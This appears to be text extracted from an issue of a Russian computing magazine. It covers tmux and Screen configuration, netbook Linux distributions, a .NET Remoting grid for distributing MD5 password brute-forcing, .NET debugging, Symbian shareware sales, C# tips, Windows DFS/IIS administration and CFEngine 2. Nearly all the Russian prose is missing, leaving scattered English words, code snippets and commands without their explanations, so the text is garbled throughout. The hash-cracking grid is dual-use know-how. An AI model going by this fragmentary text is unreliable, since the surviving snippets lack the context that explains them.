bind ' ' windowlist -b
, <C-a S>
:
bind S split

:
bind m screen -t mail mutt
<C-a m>
mail,
mutt.

Screen:
screen -t mail 0 mutt
screen -t irc 1 irssi
screen -t google 2 elinks http://
www.google.com
~/.screenrc
Screen,
mutt, irssi
elinks.
SCREEN'
4.6 OpenBSD Screen
X 04 /135/ 10
tmux. GPL-, tmux

, Screen :
* - ,
,
,

().

.
.
: vi emacs.
.

.
.
.
UTF-8.
, .
.
OpenBSD, tmux UNIX-,
FreeBSD, NetBSD, Linux, Mac OS X, Solaris AIX. tmux Debian
Sid Ubuntu Karmic,
tmux : http://tmux.
sourceforge.net. tmux,
Screen. -,

, Screen

. -, <C-a> ,
<C-b>.
,
Screen ( ). <C-b>, Screen. , <C-b c>
, <C-b 1>
.
.
, <C-b w>
, <C-b l> ,
<C-b "> ,
<C-b &>.
<C-b d>,

:
$ tmux attach
tmux ,
,
, . , :
$ tmux last-window
:
$ tmux new-window
Screen
tmux ,
,
bind,
,
tmux
.
tmux
. set-option
, set-window-option
.
(set setw),
'-g'.
, , , ,
. :
$ tmux show-options
$ tmux show-window-options
WARNING
warning
tmux

15 (

),
,
.
man-. , :
$ vi ~/.tmux.conf
#
set -g status-bg white
#
set -g status-right '#(echo $USER)@#H #(uptime
| cut -d "," -f 1)'
#
vi
set -g status-keys vi
setw -g mode-keys vi
#
set -g history-limit 1000
# <C-a>
set -g prefix C-a
unbind C-b
# <C-a C-a>
bind C-a last-window
# <C-a M>
bind M setw monitor-activity on
# <C-a /> top
bind / neww 'exec top'
INFO
info
<C-b t> tmux

, .

.
$ tmux list-commands
X 04 /135/ 10
087
UNIXOID
ADEPT ADEPTG@GMAIL.COM
:
status-left status-right. , .
Screen, :
#()
( )
#H
#S
#T
## #
, ,
. @, ,
echo $USER
( ), uptime | cut -d "," -f 1 ( )
#H.

bind new-window (neww).

, , . , tmux
attach, , ,
mutt, irssi:
tmux

2010- UNIX
, 3D-.
, UNIX
, .
(
).
elinks (http://elinks.or.cz).
, ,
, , JavaScript, , ,
, (Perl, Lua, Guile).
alpine (www.washington.edu/alpine). .

pine. ,
.
mutt, , ,
.
IM- centerim (www.centerim.org/index.php/Main_Page).
IM- centericq. .
: ICQ, Yahoo!, AIM TOC, IRC, MSN, Gadu-Gadu
Jabber. ,
.
Twitter- ttytter (www.floodgap.com/software/ttytter). Twitter-, Perl.
( ,
).
sdcv (http://sdcv.sourceforge.net).
StarDict.
.
088
new -d
neww -d mutt
neww -d irssi
new-session,
. .
'-d' , tmux
.

tmux. Screen,
<C-b ">, <C-b o>, <C-b>
. <C-b Alt-Up> <C-b Alt-Down>.

, <C-b Space>. ,
, , ,
. ,
.
centerim
X 04 /135/ 10
DVD
dvd

screen tmux,

HTTP://WWW
links
http://cli-apps.org

UTF-8 tmux , (Nicholas Marriott)
, GNU Screen
tmux, .

X 04 /135/ 10
,
,
, . z
089
UNIXOID
Adept adeptg@gmail.com

Linux
-
, Linux,
( Windows 7
Starter, ). ,
! - /SSD 4 .
LET'S MORTAL KOMBAT BEGIN

(
Asus Eee
PC 701) , ,
,
,
.
- .
-
090
(, Linux4One Kuki Linux

Acer Aspire One Leeenux
Eee PC). ,
, .
,

the best of the best.
?

x86- , Gentoo Atom'
. ,

:
,
. 10"
Gnome/KDE -
, 7"
.
X 04 /135/ 10
- Chromium OS

.
,
,
OpenOffice :).
, , , , ,
? , :
Ubuntu Netbook Remix
;
Moblin Linux Intel, 2009 Linux

Foundation;
Google Chrome OS ,
Google;
Jolicloud .

Lenovo ideapad s10-2
:
MOBLIN VIRTUALBOX
, Moblin ,
VirtualBox. :
1. img iso.
2. , IO APIC PAE/NX. .
3. , Moblin ( Live-
, ).
4. <F1> GRUB. , quiet vga=current, 3,
runlevel.
5. /etc/inittab,
/usr/sbin/moblin-dm /usr/bin/startx.
Hint: Moblin 2.1 VirtualBox 3.1 :).
X 04 /135/ 10
: 10.1", 1024x600;
: Intel Atom N270 1.6 ;
: Intel GMA950;
: 1 ;
: 160 ;
: 10/100 / Ethernet, 802.11b/g, WiMAX.
, ,
.

Ubuntu Netbook Remix (UNR)
Ubuntu Canonical
( , Ubuntu Moblin, ).
Ubuntu -
,
, . 10.04
, Gimp Tomboy.
, .
: Intel
Atom, 512 4
, , .
-
3 : ,
091
UNIXOID
MOBLIN
Moblin , , .
Ubuntu:
Moblin . ppa (https://launchpad.
net/~moblin/+archive/ppa). , ppa .
Debian:
Moblin testing unstable. ( tasksel) , . :
# apt-get install gtk2-engines-moblin moblin-cursor-theme moblinicon-theme moblin-sound-theme moblin-menus moblin-panel-applications
moblin-panel-media moblin-panel-myzone moblin-panel-pasteboard
moblin-panel-people moblin-panel-status moblin-session mutter-moblin
Fedora:
# yum groupinstall "Moblin Desktop Environment"
Mandriva:
# urpmi task-moblin
OpenSUSE:
Moblin 2.1 OpenSUSE 11.2
.
.
42 (
), 15,
4 ( VIA,
Intel GMA 500). , 4
,
community :).
, ,
9.10. 2010,
Ubuntu,
10.04.
, Ubuntu,
. :
Desktop Switcher,
Gnome'
Netbook Remix.
UNR Launcher
Gnome.

. (Favorites),
.
Go Home

UNR Launcher.
,
UNR
Launcher.
Window Picker
Gnome, ,
.
,

.
Maximus
. .
UNR , , . :
Easypeasy , UNR
( .. : Skype, , ),
.

1.5, Ubuntu 9.04.
CHROMIUM OS
Chrome OS (, Chromium OS)
Ubuntu 9.10, :
1. : <Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt
3. rw:
$ sudo mount -o remount,rw /
4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic main restricted" | \
sudo tee -a /etc/apt/sources.list
5. :
$ sudo apt-get update
092
,
Chromium OS
Eeebuntu NBR UNR,
Asus Eee PC (
). . NBR (Netbook Remix),
Standart ( Gnome),
Base (
) LXDE (, LXDE
).
3,
Ubuntu 9.04. 4 Debian
Unstable.
Leeenux Easypeasy ,
. 7" (Asus Eee
PC 701),
1,2 . 31 2.0 (
Easypeasy 1.5),
3.0, UNR
9.10.
LINUX FOR INTEL

Moblin Intel (
Linux Foundation)
MID
Intel Atom.
GNOME Mobile Clutter (
).

2.1, -
.
: Intel SSSE3 (Atom Core 2, SSSE3 ), Intel (Nvidia, AMD Intel GMA500
). 17
5 . , 5

( Intel
). ,
- . ,

Linux Foundation,
.
Moblin
, dd

.
X 04 /135/ 10
Moblin' ,
-.
(, twitter last.fm).
12 :
MyZone , ,
;
Status
;
People ;
Internet , Firefox 3.5. -
;
Media / . -
;
Pasteboard ;
Applications (
) ;
Zones (
<Alt+Tab>);
4 , , Bluetooth .
, Moblin
-, . ,
:
ext4,
2.6.31;
GUI-
(Connman)
, IP- ( DHCP);
-
;
/
;
.
mc! :)
Ubuntu Netbook Remix
X 04 /135/ 10
Login-screen Chromium OS Zero

,

Google. ,
( Chromium OS www.
chromium.org/chromium-os)

Live CD/USB.
LiveUSB Chromium OS Zero (http://chromeos.
hexxeh.net).
, , ,
Chrome OS Google Google Google.
. ? !
Google Docs. ? Google Mail! IM-?
Google Talk! , (
Chromium OS Ubuntu)!
INFO
info
MID (Mobile Internet
Device)
(
4-7 ),
,
,

-.
SSSE3
(Supplemental
Streaming SIMD
Extension 3)
,
Intel'
.
SSE3,
32
,
.
,
Chromium
OS
,
.

Google,
Chrome
OS (

x86, ARM
)

2010.
093
UNIXOID
Moblin

:
Google
.
.
Chromium OS
Google ,
7 .
,

.
Chrome OS
, -
.

// .
(

:) ) (, ),

.
, /
.
Google- ( , ,
).

(, Google Chrome)
Google Mail.
Chrome (
).
,

. , ,
,
,
:). Chromium
OS 19 : ,
Google ,
Yahoo! Mail Hotmail.
(, , )
. <F8>,
.
, :
<Ctrl+Alt+T> ,
!
, Chromium
OS ,
( ,
Ubuntu). wiki- 15
.
, -, ,
Google , .

(, CAD- -
?)
.
Moblin
094
X 04 /135/ 10
Jolicloud

, Google.
. -
$4.2
. Ubuntu,
- Debian - JoliCloud, -
Ubuntu Netbook Remix Chromium OS. ,
, , -, Google.
:
ISO- ( LiveCD).
JoliCloud , ,
Ubuntu.
Windows ( XP
7).
, . /
. !
( Intel GMA500 VIA
C7M). , JoliCloud 98%
. 75 /, 7
3 . 98%
:).
.

JoliCloud-. :

.
, Web- Mozilla Prism.

JoliCloud.
.

JoliCloud (- )
, .
-,
(
, ).
, , JoliCloud-,
UNR:
;
X 04 /135/ 10
Jolicloud.
Flash Gears Firefox;

.

. ,
, PreBeta (0.3).

4 , , , .
Ubuntu Netbook Remix Ubuntu,
(
-- Ubuntu One).
, .
,
.
Moblin ,
. -
IRC. ,
(. Moblin
).
Google Chrome (Chromium) ,
. .
Google Groups (chromium-os-*)
IRC. , .
Jolicloud .
,
. ,
, ,
Windows , Linux-.
(www.techreviewonlineforum.
com/jolicloud-forum-f17.html), Facebook
( 5000 ) twitter (http://twitter.com/
jolicloud).
Linux . z
DVD
dvd

.
HTTP://WWW
links
:
www.ubuntu.com
moblin.org
www.chromium.org
www.jolicloud.com

:
www.phoronix.com/
scan.php?page=
article&item=
chromium_moblin_
benchmarks
095
CODING
c0n Difesa condifesa@gmail.com) http://defec.ru
.NET REMOTING:
GRID-

(), , - .
,
.

. ,

,
.
.
,

:
, , ,
. -
,
,
. ,
( ,

).

.

, , ,
.
096
, ,
.
. , ,
.
.
- ( . grid ,
) , , (), . ,
.
,
, ,
.
, ,
.
, (,

)

, .

, .

,
. ,
,
, . , ( ) ,
.
, ;).
,
.

(dedicated servers)
;). ,
, MD5, -,
, ,
.
.
? !
Microsoft .NET C#. MS

,
MSDN .
X 04 /135/ 10
-

, .NET .

, .
, .NET
,

. , .NET Remoting. ,
- ,
C#, , , (,
, ..). ,
, , .
, ,
( -).
- ,
, ,

. :

, . , . ,
,
.NET Remoting .

( 39993),
, .
:
,
, ,
. , ,
, :
, , , .
:
.
Microsoft
: , ,
. :
X 04 /135/ 10
, , ,
.
, , -.
(remoting)

//
39993
TcpServerChannel channel=new
TcpServerChannel(39993);
ChannelServices.RegisterChannel(channel);
//
RemotingConfiguration.
RegisterWellKnownServiceType(
typeof(Bot),//
"Bot", //URI
//

WellKnownObjectMode.SingleCall);
URI, Uniform Resource Identifier (

) ,
: URI
, Bot.
, ,
:
//
TcpClientChannel channel = new

TcpClientChannel();
ChannelServices.RegisterChannel(channel);
//

RemotingConfiguration.
RegisterWellKnownClientType(
typeof(Bot), //
//URI
"tcp://localhost:39993/Bot");
INFO
info

:
hash.txt
,
distribute.exe
client.exe.
DVD
dvd

Microsoft
Visual Studio 2008.
URI .
( , TCP)
, .
(localhost,
IP- ) , Bot ,
. URI
,
( , 39993).
097
CODING
ALEKSANDR-EHKKERT@RAMBLER.RU
: , Bot ,
System.MarshalByRefObject:

public class Bot:MarshalByRefObject
{
...
}
,
, .
, :
Bot brain = new Bot();
brain , ,
,
, .
, ( )
. ,
, , (
, ), .
,
.

():

//-
int Core=(Int32)System.
Environment.ProcessorCount;
// ()
int Takt=(Int32)Registry.GetValue(
@"HKEY_LOCAL_MACHINE\
HARDWARE\DESCRIPTION\System\
CentralProcessor\0", "~MHz", 0);
098
,
,
() :
int RangeValue = Core * Takt * 9;
//
,

(
) .

:
1. ;
2. ;
3.
.
() .
1-3;
4.
.
, , , .
,
,
. , :

.

.
, .

,
. ,
, ,
abcde39# .
( !zxcv4M
1234567). n- ,

1.
;).
Bot. GetJob(int
<__>).
,
brain GetJob:
brain.GetJob(" ");
, , , .
,

.

:
,
,

.
,
,
-
,
a.k.a John the Ripper.

/pen-/security-
, . ,
,
,
, ? : -
,
( ;)) ,
.
:
,
. , MD5-.
,
! z
X 04 /135/ 10
stannic.man@gmail.com
.NET

.NET FRAMEWORK
, .NET-
, , ,
.NET Framework
Win32-.
.NET- , ,
PE-.
, PE-
, runtime-
CLR. , .NET
CLR. .NET ,
mscoree.dll

_CoreExeMain. ,

, .NET .
,
.NET
_CoreExeMain .
, .NET- ,
,
.NET-
.
,
, .
.NET
Framework?
-, X 04 /135/ 10
. ,
.NET .
CLR ,

.

.
(reflection).
.NET Framework
, ( CLR) .

, -,
,
MSIL-, .

.
Visual Studio ,
.
,
Visual Studio.NET,
IntelliSense.
IntelliSense , ,

. Visual Studio.NET
, .
CLR
, , .

,
.
.
,
, , .
,
,
.
, .
(
)?
?
, .
:
TypeDef ,
MethodDef, PropertyDef
EventDef, ,
.
MethodDef
, . FieldDef,
ParamDef, PropertyDef EventDef, ,
, , , ,
.
, AssemblyRef,
,
, ModuleRef
099
CODING
CorDbg
INFO
.NET, exe-, dll ,

IL. ,
ILDASM
Win32-,
! ,

, MSIL,
www.ecma-international.org,
. ?
,
:).
info

ILDASM

(call stack)
microsoft.
visual.studio.
dll!DesignerHost.
Add
IL-
DVD
dvd

,
.NET
Framework.
HTTP://WWW
links
blogs.msdn.com/
jmstall

,

geekswithblogs.
net/.netonmymind/
archive/2006/03/14
/72262.aspx
WinDBG+SOS, adplus.
vbs,
\ adplus.vbs www.
microsoft.com/whdc/
devtools/debugging/
default.mspx.
100
.NET-
PE-, , .
, TypeRef
MemberRef. ,
, ,
.
, .NET, ILDASM ( )
Ctrl+M.
, , .NET-,
,
. , Donut
CLR- .NET . CLR COM-, .NET IMetaDataDispenser
IMetaDataDispenserEx, IMetaDataEmit IMetaDataAssemblyEmit.
.NET-
ILDASM, Microsoft
IL. , Visual
Studio.

, IT :
www.xakep.ru/magazine/xs/066/058/1.asp .NET
: (
!)
www.xakep.ru/magazine/xa/108/118/1.asp
:
Microsoft
, .
: CorDbg , GUI- DbgCLR. ,
DbgCLR Visual
Studio.
CorDbg
, .NET Framework.
CorDbg
IL- dis[assemble] , set.
,
reg.
orDbg
MSDN.
(, !)
Mdbg, Visual Studio,
CorDbg.
DBGCLR
, Visual Studio,
, .
,
.
, , System.Diagnostics.Debug.
, .NET , Assert(), ,
:
System.Diagnostics.Debug.Assert(, ...)

: System.Diagnostics
X 04 /135/ 10
>> coding
DBGCLR Visual Studio

managed unmanaged
ILDASM
StackTrace,
.
GetFrame(0)
StackTrace ,
, GetMethod()
MethodBase,
.
:
StackTrace stack = new
StackTrace(0);
for(int i = 0; i <
stack.FrameCount; i++)
{
Console.WriteLine(stack.
GetFrame(i).GetMethod().Name);
}
, , .
StackTrace,
, StackTrace
Exception. , .
StackTrace Exception
() .NET FRAMEWORK

(. . )

IL- (executive)

X 04 /135/ 10
. ,
CLR. CLR ,
throw.
, CLR . ,
catch StackTrace ,
CLR. CLR
, ,
, .
Visual Studio
(managed) .

,
Unmanaged code debugging.

,
, .

, .NET
Framework 2.0

WinDBG.

! z
101
CODING
root@dtarasov.ru
,
shareware
Symbian.

, , ,
:).
SHAREWARE

Shareware
, (
)

(-, .

:) . .).
,

. ,

( ),
,
,
. 99,99%
( ),

,
,
.
, Shareware, , ,

:
,

;
( );
102
, ,
;
; .

10
,
. ,
:

;
(
);
( ,

);
;
;
.
, , , Nokia --
.
.
Symbian. ,

SHAREWARE
SYMBIAN
, , .
,
.
,
. ,
.
SYMBIAN?
target-
. .
. Symbian (
50%),
, , ,
. ,

Symbian
,
(/
SMS, , ).

, .
, ,
Symbian , ,
X 04 /135/ 10
Windows, , Windows Mobile,

. ,
Windows, Linux Mac OS,

Symbian.
:
( ),
.
,
. , , ,
.

,
.
, 30%
. 70% ,
, ,
- .
,
, .
, ,
.

, , .
.
,

.

, ( ) ,
.

X 04 /135/ 10

.

.
,
.

Symbian-, .
SYMBIAN

,

:

- .
,
Hello World.
- ++,
.

. ,
forum.nokia.com, ,
Developing
Series 60 Applications. A guide for Symbian OS
C++ Developers, Symbian Press.

. , ,

.
,
:).
,
, ++.

Symbian.
Nokia N97,
. ,
S60 , -
,
,

. ,
,
S60, .
.
, IDE, , Carbide.C++
. -
Nokia Microsoft Visual
Studio.NET. ,
SDK
.
-
, , ,
.
Symbian ,
-
, .
Symbian,
,
. ,
Symbian,
/++ ( ),
Qt. Qt
, ,
UI.
Symbian ++.
,
,
.
, ,
, ,
. ,

, ,
103
CODING
sms/mms,
, ,
, , .
,
,

.
,
,
.

,
.

, , , .

Blacklist Mobile.
, Symbian.
. ,
,
.
?
,
. ,
,

.
.
: ,

SMS

.

30 , 10 .

,

.
104
, Symbian, .
,
Symbian
(, ),
, .

,
.
Openbit,
,
. Openbit License Manager

,

,
premium sms (
100 ),
. .
2500
10% .
,
. , ,

.

95%
,
. .
, , , ?
-
. , ,
,
.

50%
!, .
,
,
. Handango, Symbiangear,
Cellmania, .

, . , ,
-, .

Ovi Store Nokia.

,
Nokia.

.
Symbian-.
-
Softkey.
, ,
-,
,
. , Softkey Nokia:
Nokia
,
.
Nokia
,

. , . :
, ,
,
. ,
. ,
,
.
.

. ,
, . -
X 04 /135/ 10
>> coding

, ,

(
pre-loading).
,
, .

,
.
.
Openbit
50000 .

. ,
, .
, .
.

. , ,
,
,
.
,
,
. ,

, , .
,
,
,
X 04 /135/ 10
.

.
SBSH Software (http://sbsn.net).

, 30% .
-
, . ,
,
. ,
,

.
, , ,
. ,
.
Windows Mobile
,
Windows.
WM, . , , (-,
. .).
.
iPhone Symbian , ,
,
AppStore
( jailbreak
1-3 ),
,
. ,

.
Android
, . , , ,

Symbian. Symbian^4
,
Symbian .
, Java, .
Blackberry ,
, Java. , ,
. Maemo
, , Nokia.
, , . ,
, ,
. Java2ME
.
.
- ,
, .
,
.
,
, .
,
,
. ,
, ,
.
, ,
. . . z
105
CODING
stannic.man@gmail.com

C#
, .
][,
C#
:).

,
C#,

.
. ,
( ),
. readonly-, .
IS IsSubclassOf()?
C#
readonly ( ):
public readonly int ReadonlyValue = 1;
public const int ConstValue = 1;
?
, readonly
.

, , ,

106

is IsSubclassOf()? , ,
?
-, is
,
MSIL asclass,
IsSubclassOf()
. is ,
null,
IsSubclassOf() . , is
, ,
IsSubclassOf() .
C#
: as
. ,

.
-
,
NullReferenceException,
as null.
,
as,
NullReferenceException, - .
.
X 04 /135/ 10
/OPTIMIZE /DEBUG

C#
:
C#?
get/set . ,

.
-, , , - :
set { param1 = value; DoSomeWorkOnChanged(); }
-, , :
set { if (value > 0) param1 = value; }.
-, ,
, , ,
:
get { return ReadFormDB(param1); }
set { WriteToDB(param1, value); }
Win32-

Win32.
C#?
Windows.Forms.IMessageFilter.
m.LParam m.WParam:
Win32-
public class Win32MessageFilter:
X 04 /135/ 10
System.Windows.Forms.IMessageFilter
{
public bool MessageFilter(ref Message m)
{
//
if(m.Msg == 513)
{
MessageBox.Show("Win32 message WM_LBUTTONDOWN");
return true;
}
return false;
}
}
static Win32MessageFilter filter =
new Win32MessageFilter();
static void Main()
{
Application.AddMessageFilter(filter);
Application.Run(new Form1() );
}
,
.
checked unchecked
C# checked unchecked,
. checked-:

byte a = 1;
byte b = 255;
107
CODING
checked
{
byte c = ( byte ) ( a + b );
byte d = Convert.ToByte( a + b );
Console.WriteLine(" { 0 } { 1 }", b + 1, c );
}
, (a + b) int byte . Convert.ToByte,

checked, Console.
WriteLine(). , unchecked,
. checked
unchecked / :
checked ( c = ( byte ) ( b + a )).
,
/checked ,
unchecked ,
.

( , ,
(). ,
.NET Framework
.
System.Object Equales, true
.
Object:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if( this == obj ) return true;
return false;
}
}
, ? Equals
, .
, Equals Object
,
. , Equals:
Equals
public class Object
{
public virtual Boolean Equals( Object obj )
{
if ( obj == null ) return false;
if ( this.GetType() != obj.GetType() )
return false;
108
return true;
}
}

Equals() .
.NET , , ,
Object.ReferenceEquals().
C#, /optimize /debug.

,
, JIT- CLR , ngen.exe,

.NET Framework SDK.
IL- .
, CLR
, , , , .

, ,
. ,
,

. () (,
, ;)), ,
.NET- ,
.
.NET
.
, ,
; :
, CLR .
, .
SetMaxThreads GetMinThreads. , ,
SetMaxThreads,
, .
25 ,
.
, , CLR
500 . ,
SetMinThreads,
.
, ,
500 . z
X 04 /135/ 10
SYN/ACK
grinder grinder@synack.ru
urban.prankster martin@synack.ru

. , ,
.
, ,
.
,
.
ACTIVE DIRECTORY
-.
.
, ,
( ,
), , WiFi,
.
,
. , 1
. ,
.
,
.
- , .
,
.
,
,
, , . :
, ,
.
,

110
.
,
.
,
.

.

, , ,

.

(. Active
Directory ][ 04.2007 AD ][
11.2008), .
, Active Directory, Active Directory (dcpromo)
, : ,
( ), ,
( ), ,
,
-, .

,
, ,
.
, . , ,
, , ,
, , .
, , , .
-
, ,
.
,

NTFS , , , .
,
, . . ,

RDP
,
( Windows
, ][).
X 04 /135/ 10
, ( ,
). , ,
,
. , , ,
. ,
(Read-Only Domain Controller,
RODC),
, RODC
.
, .

.

,
. (Distributed File System, DFS). ,
,
, . ,
,

, ,
. , (Remote Differential
Compression RDC), ,
. ,
, ,
.
, DFS Active Directory
Standalone (), ,
, DFS.
X 04 /135/ 10
,
][ 2007 , DFS
Win2k3. Win2k8/R2 DFS ,
. DFS
.

DFS DFS.

Namespace .
. Active
Directory, .

, (
),
. , ,
. ,
.
.
:
> ServerManagerCmd -install FS-DFS FS-DFS-Namespace \
FS-DFS-Replication
DFS,
. , , .
, DFS
. ,
.
, . ,
,
.
, , . DFS, Win2k8,
,
. , .
, , , , (,
111
SYN/ACK
DFS
-, ), .
, ,
,
.
,
, ,
, .
, .

.
:
.doc , ,
. (Enable Access-Based

Active
Direcory
Active Directory ,
. , Microsoft .
Microsoft Assessment and Planning Toolkit ,
( , WMI) , ,

(Hyper-V, SQL ). Active Directory ,
.
Active Directory Sizer tool, ( , , Exchange) . , Active Directory Sizer
tool Win2k,
.
ADTest.exe Active
Directory .
, .
Active Directory Migration Tool (ADMT), ,
.
.
112
Enumeration, ABDE)
. ABDE
.
:
DFS ,
,
. ABDE
. . dfsutil. :
> dfsutil property ABDE \\synack.ru\
Namespace1
\\synack.ru\
Namespace1: ABDE

:
> dfsutil property acl grant \\srv1\
Namespace1\docs "SYNACK\
Domain Admins":R Protect Replace
:
Win2k8/Vista,
.
.
DFS . ,
Win2k8 SYSVOL
DFS.
,

.
DFS RODC, DFS
SYSVOL
.
Win2k8R2 ,
DFS
. DFS

, Standalone,
Domain-based DFS.

,
X 04 /135/ 10

, .
: ,
RDP,
. , , .
,
TS (Terminal Services)
, . Win2k Win2k3
,
Win2k8 ,

TS. RemoteApp,
, -
(TS Web Access) (TS Gateway) ( TS Win2k8
][ 09.2008).
Win2k8R2 Virtual Desktop
Infrastructure (VDI), ( ) ,
.
, R2 Terminal Services

(Remote Desktop Services, RDS),
. .
RDS Win2k8R2,

. ,
, . ,
,
. RDS , , .
VDI Hyper-V,
, ( Hyper-V
, ][ 02.2009).
,

.
, CredSSP ( Vista ),
X 04 /135/ 10
RDS
.
,
,
DoS-
. .

, - ,
, Aero (,
).
RDS
, .
. ,
(, ,
),
Windows ( / -), ,

( ).
NAP ( ][ 12.2008).
,
,

.
- RDS.
(RD Connection Broker, Win2k8
), ,

( Win2k3 Session
Directory ( )).
,
- (
).

( -
INFO
info

:

Win2k3
Active
Directory, ][_04_2007.

Win2k8 AD, ][_11_2008.
Hyper-V

,
][_02_2009.
Terminal
Services Win2k8

, ][_09_2008.
NAP
,
][_12_2008.
NLB
Win2k3 ,
][_02_2008.
Failover
Cluster Win2k8
,
][_10_2008.
113
SYN/ACK
Windows
- .

.
IIS
HTTP://WWW
links
Microsoft, Win2k8R2
www.microsoft.com/
windowsserver2008/
ru/ru.
114
), , ,
. , ,

.
.
.
. 100,
50,
, . IP-,

IP-, . , , . ,
:

IIS - , ,
,
-
.
, ,
. Win2k8/R2
IIS 7.,
,
-. IIS
, .
40 IIS, 8
, .
XML- ( %systemroot%\
windows\system32\inetsrv\config)
( IIS
Apache), - (
xcopy). .

(Shared Configuration), (AppHost.config), UNC
, -,
-.
,
(
NTFS ). IIS

. ,
, ,
.
,
. ,
. - .
(
, ),
.

IIS, .
DFS
( ) , -.
Network Load Balancing (NLB)
-.
, , , ,
.
, ,
.
. z
X 04 /135/ 10
SYN/ACK
j1m@synack.ru
CFENGINE 2
,
,
.
dssh rsync ,
. ,
.
CFENGINE (CONFIGURATION ENGINE)
,

. CFEngine
,

. .CFEngine
,
, / , / , , .

,
,

.

CFEngine
, ,
.

,
,
. ,

,
X 04 /135/ 10
,

CFEngine 2.
, CFEngine
UNIX- Linux-,
. ,
Debian/Ubuntu
:
$ sudo apt-get install cfengine2
CFEngine
:
(cfservd)
(cfagent)
(cfexecd)
cfservd ,
, .
cfagent,
CFEngine-, . ,
( ,
, . .).
cfexecd
-.

/ .
, CFEngine

, . cfrun,

( ).
cfkey
"/ ",
. cfenvd , ,
, ,
..
cfagent

, cfenvgraph

. Cfshow
CFEngine
.

var (/var/lib/cfengine2),
:
CFEngine 2
bin , /usr/
sbin
inputs ,
/etc/cfengine2
modules
ppkeys
state CFEngine
115
SYN/ACK
update.conf
cfservd.conf
Client
(cfservd
cfexecd)
cfr
un
cfa
gen
t
Policy server
(cfservd)
cfagent
update.conf
cfservd.conf
cfrun
Client
(cfservd
cfexecd)
CFEngine
, . ,
, :
.
.
, .
.
.
, .
.

, ,
,
.
,

. ,
,
.
-,
. ,
apache
, ,
apt-get install apache2,
httpd.conf.

. CFEngine , , . :
116
cfagent.conf
cfrun.hosts
cfservd.conf

:
class1::
# 'class1'
class2|class3::
# 'class2|class3'
, .
CFEngine 20
, files,
, editfiles
, packages . ,
, , . ,
- . , .
, . ,

. "" , CFEngine -,
,
. - control,
, ,
actionsequence. :
$ sudo vi /tmp/sample.conf
control:
actionsequence = ( files )
X 04 /135/ 10
files:
/etc/shadow owner=root
group=shadow mode=0640
action=fixall
,
:
1 files (
).
2 files
/etc/shadow
, (0640, root, shadow).

(, /tmp/sample.
conf) :
$ sudo cfagent -f /tmp/sample.conf
,
files
MD5- ,

( tripwire).

mountall
, fstab
mountinfo

checktimezone

netconfig
resolve /etc/
resolv.conf
unmount
packages //

shellcommands
editfiles
addmounts
directories
links
mailcheck
required

tidy
disable
files
copy
processes
module:name

,
//
X 04 /135/ 10

. Linux /etc/shadow, root:shadow, , ,
FreeBSD :
/etc/master.passwd root:wheel.
?
().

Linux-, FreeBSD:
control:
actionsequence = ( files )
files:
linux::
/etc/shadow owner=root
group=shadow mode=0440 action=fixall
freebsd::
/etc/master.passwd owner=root
group=wheel mode=0440 action=fixall

, , ,
CFEngine
, ,
.
, , :
$ sudo cfagent -pv
, . CFEngine

libc,
, .
,
(, Hr00 , Hr12
..),
.
CFEngine "" "". , , freebsd|openbsd FreeBSD,

OpenBSD. Hr00.OpenBSD
.
,
. ,
, .

control,
:
control
openbsd::
crondir = ( /var/cron/tabs )
linux::
crondir = ( /var/spool/cron )
solaris::
crondir = ( /var/spool/cron/
crontabs )
CFEngine ,
.
:
control:
actionsequence = ( editfiles )
classes:
linux_sys = ( IsDir(/sys) )
shellcommand:
linux_sys::
"echo /sys "
- classes linux_sys,
,
/sys .
117
SYN/ACK
CFEngine , . cfkey .
/var/lib/cfengine2/
ppkeys: localhost.pub ( ) localhost.priv (
).

- /var/lib/cfengine2/ppkeys/IP-.pub.
/var/lib/cfengine2/ppkeys/root-IP-.pub.
cfkey
IsDir ,
. CFEngine
,
:
HTTP://WWW
links
www.freesource.
ru/dokumentaciya/
cfengine

CFEngine2
www.cfengine.
org/manuals/cf2Reference.html

CFengine2
INFO
info

cron.
control
cfagent.conf

:
Schedule = ( Min30_35 )
118

classes
IsNewerThan(f1,f2) , f1
f2
FileExists(f) , f
IPRange() IP- IP-
IsDefined()
IsDir(f) f
IsLink(f) f
IsPlain(f) f
Regcmp(re, ) re
Strcmp(s1,s2)
CFEngine,
:
1 CFEngine.
2 ,
CFEngine.
3 .
, ,
"". ,
.
, .
,
CFEngine ,
.
,
.
cfengine2
Ubuntu

:
1 cfagent.conf (
).
2 cfservd.conf , .
3 cfrun.hosts ().
.
:
$ sudo vi /etc/cfengine2/cfagent.conf
#
control:
#
actionsequence = ( resolve files tidy
processes )
#
domain = ( xakep.ru )
# ()
timezone = ( MSK )
# SMTP- e-mail (
)
smtpserver = ( smtp.xakep.ru )
sysadm = ( admin@xakep.ru )
# resolv.conf
resolve:
192.168.1.1
192.168.1.2
#
files:
/etc/sudoers mode=440 owner=root group=root
action=fixall
/etc/passwd mode=644 owner=root group=root
action=fixall
/etc/shadow mode=640 owner=root
group=shadow action=fixall
#
tidy:
/tmp pattern=* age=7 recurse=inf
/home pattern=*~ age=7 recurse=inf
#
processes:
# inetd
"inetd" signal=hup
X 04 /135/ 10
web-
Web- CFEngine
CFEngine,
,

.
cfservd.conf
:
$ sudo vi /etc/cfengine2/cfservd.conf
control:
#

TrustKeysFrom = ( 192.168.1.0/24 )
any::
#
MaxConnections = ( 50 )
grant:
# , xakep.ru
/var/lib/cfengine2/inputs
*.xakep.ru
, :
. , cfrun.hosts

:
$ sudo vi /etc/cfengine2/cfrun.hosts
domain = xakep.ru
#
srv1.xakep.ru
srv2.xakep.ru
, CFEngine:
$ sudo /etc/init.d/cfengine2 restart
X 04 /135/ 10
update.conf.

,

cfagent.conf. :
$ sudo vi /etc/cfengine2/cfservd.conf
control:
#

AllowConnectionsFrom = (
192.168.1.0/24 )
TrustKeysFrom = ( 192.168.1.0/24 )
# cfagent
cfrunCommand = ( "/usr/sbin/
cfagent" )
MaxConnections = ( 50 )
grant:
/usr/sbin/cfagent *.xakep.ru
$ sudo vi /etc/cfengine2/update.conf
control:
actionsequence = ( copy )
CFEngine :
# cfengine
policyhost = ( cfserver.xakep.ru )
# ,
master_cfinput = ( /var/lib/
cfengine2/inputs )
#
repository = ( /var/lib/
cfengine2/outputs )

, CFEngine
.
# cfagent.conf
# /etc/cfengine2
copy:
$(master_cfinput)/cfagent.conf
